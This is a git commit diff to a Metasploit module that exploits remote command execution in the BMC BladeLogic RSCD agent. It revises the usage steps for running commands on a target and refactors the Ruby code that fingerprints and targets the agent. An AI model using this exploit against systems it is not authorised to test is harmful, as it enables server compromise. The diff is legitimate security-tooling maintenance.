Tidied up platform detection, check method, and minor typos.

MS-2855/keylogger-mettle-extension
Nicky Bloor 2018-01-14 18:28:40 +00:00
parent 6568d29b67
commit 333ee893d3
2 changed files with 41 additions and 30 deletions

View File

@ -19,8 +19,8 @@ To use this exploit you will need access to BMC BladeLogic Server Automation.
4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`.
5. Select the generic command target `set target 3`.
6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`.
6. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
7. Run the exploit `exploit`.
7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
8. Run the exploit `exploit`.
The result should be that the string `MSF` is returned and output.
@ -63,7 +63,7 @@ This module target provides support for command staging to enable arbitrary Meta
[*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000
### Target 2: Unix/Linux
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same was as target 1.
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1.
### Target 3: Generic Cmd
This target can be used with *cmd* payloads to execute operating system commands against the target host.

View File

@ -78,31 +78,30 @@ class MetasploitModule < Msf::Exploit::Remote
def check
# Send agentinfo request and check result
print_status('Checking for BMC with agentinfo request.')
vprint_status('Checking for BMC with agentinfo request.')
res = send_agentinfo_request
if res && !res.empty && res.start_with?('Response: ')
# Check for length field in response packet
res_pkt = res[10..res.length]
if res_pkt.length > 3
length_field = res_pkt[0..3].unpack('N')[0]
if res_pkt.length - length_field == 4
# Response packet appears to be in the correct format
print_warning('Unexpected agentinto response. Enable verbose ' \
'output for actual response.')
vprint_warning(res)
return Exploit::CheckCode::Unknown
end
end
# The response wasn't in the expected format, probably not BMC RSCD
print_error('The target does not appear to be a BMC RSCD agent.')
vprint_error(res)
return Exploit::CheckCode::Safe
else
# BMC detected, print platform and return
print_good('BMC RSCD agent detected, platform appears to be ' + res)
return Exploit::CheckCode::Detected
# Check for successful platform detection
if res[0] == 1
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
return CheckCode::Detected
end
# Get first four bytes of the packet which should hold the content length
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
# Return unknown if the packet format appears correct (length field check)
if res[1] && res[1].length - 4 == res_len
vprint_warning('Target appears to be BMC, however an unexpected ' \
'agentinfo response was returned.')
vprint_warning('Response: ' + res[1])
return CheckCode::Unknown
end
# Invalid response, probably not a BMC RSCD target
vprint_error('The target does not appear to be a BMC RSCD agent.')
vprint_error('Response: ' + res[1]) if res[1]
CheckCode::Safe
end
def exploit
@ -113,7 +112,15 @@ class MetasploitModule < Msf::Exploit::Remote
# Attempt to detect the target platform
vprint_status('Detecting remote platform for auto target selection.')
platform = send_agentinfo_request
target_name = if platform.downcase.include?('windows')
# Fail if platform detection was unsuccessful
if platform[0].zero?
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
'detecting target platform.')
end
# Set target based on returned platform
target_name = if platform[1].downcase.include?('windows')
'Windows/VBS Stager'
else
'Unix/Linux'
@ -159,7 +166,6 @@ class MetasploitModule < Msf::Exploit::Remote
# Generate and send the payload
vprint_status('Sending command to execute.')
vprint_status('Command: ' + command)
sock.put(generate_cmd_pkt(command))
# Finish the nexec request
@ -208,9 +214,14 @@ class MetasploitModule < Msf::Exploit::Remote
res = sock.get_once
disconnect
# Extract platform from response
return res.split(';')[4] if res && res.split(';').length > 6
'Response: ' + res
# Return the platform field from the response if it looks valid
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
return [1, res.split(';')[4]] if res &&
res.split(';').length > 6 &&
res.length == (res_len + 4)
# Invalid or unexpected response format, return the complete response
[0, res]
end
# Connect to the target and upgrade to an encrypted connection